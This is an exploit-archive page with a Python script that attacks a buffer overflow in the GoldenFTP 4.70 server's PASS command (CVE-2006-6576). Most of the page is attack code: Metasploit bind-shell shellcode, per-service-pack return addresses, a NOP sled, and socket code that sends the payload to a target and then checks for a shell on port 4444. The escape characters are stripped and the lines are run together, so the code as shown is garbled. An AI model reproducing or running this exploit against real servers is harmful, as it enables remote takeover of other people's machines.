Home / exploits Golden FTP 4.70 Overflow
Posted on 06 July 2011
#!/usr/bin/python # Exploit Title: GoldenFTP 4.70 PASS exploit # Date: July 5, 2011 # Author: Joff Thyer (jsthyer@gmail.com) # Software Link: http://www.goldenftpserver.com/ # Version: 4.70 # Tested on: WinXP-SP0/SP2/SP3 # CVE: 2006-6576 # # based on exploit written by: # Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg) # # Exploit tested on WinXP-SP0/SP2/SP3 # # Notes: # - Address 0x004c2030 contains a pointer to where the injected code address # must be written. # - IP address used to connect to FTP server impacts pointer to address. # - Opcodes starting at 0x004233EF are the exploited assembly sequence. # note: address gets moved into EAX, and control obtained through 'CALL EAX'. # import socket import sys import os import time # windows/shell_bind_tcp - 395 bytes # http://www.metasploit.com # AutoRunScript=, EXITFUNC=process, InitialAutoRunScript=, # LPORT=4444, RHOST= # Generated with: msfpayload windows/shell_bind_tcp r | msfencode -c 2 -t ruby -b 'x00x0ax0d' scode = "xdbxc7xbbx63x6fx93x72xd9x74x24xf4x5dx33xc9" +\n"xb1x5dx31x5dx17x83xc5x04x03x3ex7cx71x87x7a" +\n"x1bx36xc1x6bxc6x75xc8xffxd2x71xb6xd6xd3xcb" +\n"x1fx19xb1x38x23x9cx3dx3cx76x88x9fx1ex95xf4" +\n"x73x01x6bx64x44x28x9fx25x86x18x20xb6xe8xa5" +\n"xf3xa7x93xe1xcdx43x4cxb6x38x76xd6x8bx7fx16" +\n"xb3x91xf5x7axa9x60xdbx32xfcx5axc1xf7xf3xdb" +\n"xb2xd2x57x0cx3ex8bx19x11x11x98xaax18x4cxcd" +\n"x47xefx4dx16xf6xb8xe0x8fx44x36x6exf3x2ex97" +\n"xe5x3axabxc5x3cx02x82x20x6axecx17xdbx74xc6" +\n"xd0xcaxbdx3dxf1x61xa2xc2x96xfcx30x7ax29xa1" +\n"x5cxe6x23x1ex57x09x66x06x8dxe9x52x6axb2x98" +\n"x9ax07xd7x96x77xd0x06x23x65x17xbbxf6xbax6b" +\n"x44x8exe2x26x10xe7x71x4cx5bx21xbax83xfcxce" +\n"x48x90x51x30xfax87x84xdex21x8bxc9x2fxa6xff" +\n"xe5xf5x18x0cx59x98x82x8exf7x83x94x04x6fxfe" +\n"x2cxbdx29xedxeex89xacxd5xb3x94xe7xb7x10x82" +\n"x51xf5x95x13x84x44xc8x53x24x7ex3ax22x60xe7" +\n"xe0xc9x63x1bx59x53x78x67x37x80x06x97x8fxde" +\n"x19x30xa2xa5x16x8exe6x6bx04x68xadx48xfdxd1" +\n"xd2x24x1ex24xf8x14x23x14xd8xf2x68xe3x85x51" +\n"xb8xddx95x37xdax59xe9x49xf5xa1x74x40xadxbe" +\n"x5fx48x03xa5xa5x36x0cx3ex32xa8x9fxdfxf9x28" +\n"x45xc1x7cxf3x03xcdx21x53x31x49xd1x5dx2ax43" +\n"x04x41x19xefx74xddx9exb7x4fx4ex21x59x8ax77" +\n"x57x9bx61xd3xa4x62x55xedxecx1exc0xacx2ax8f" +\n"x2bx7fx59xd4x84xfax8ax44xdcx1cx01xddxd0xfc" +\n"xdexb2x03xe5x8fx56x36x44xf9x91x40x32xb4xaa" +\n"x78xfex2f" if len(sys.argv) < 2: print "[-]Usage: %s <target> <platform>" % sys.argv[0] print " platform = (sp0|sp1|sp2|sp3)" sys.exit(0) target = sys.argv[1] platform="" if len(sys.argv) > 2: platform = sys.argv[2] if platform == "sp0" or platform == "sp1": retaddr="x69x3cxa9x00" elif platform == "sp2" or platform == "sp3": retaddr="x9dx3cxa9x00" else: platform="sp3" retaddr="x9dx3cxa9x00" nopsled = "x90"*32 padding = "x90" * (541 - len(target + scode + nopsled)) payload = nopsled + scode + padding + retaddr s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) print "[+] Golden FTP PASS Exploit, Author: Joff Thyer, 2011" print "[+] 'Show new connections' must be enabled in GoldenFTP in order" print "[+] for this exploit to succeed!" print "[+] Connecting: "+target try: s.connect((target,21)) except: print "[-] Connection to "+target+" failed!" sys.exit(0) print "[+] Sending payload..." s.send("USER anonymous ") s.recv(1024) s.send("PASS "+payload+" ") s.recv(1024) time.sleep(1) retval = os.system('netstat -na | find "4444"') if retval > 0: print "[-] Exploit failed" else: print "[+] Exploit succeeded!"
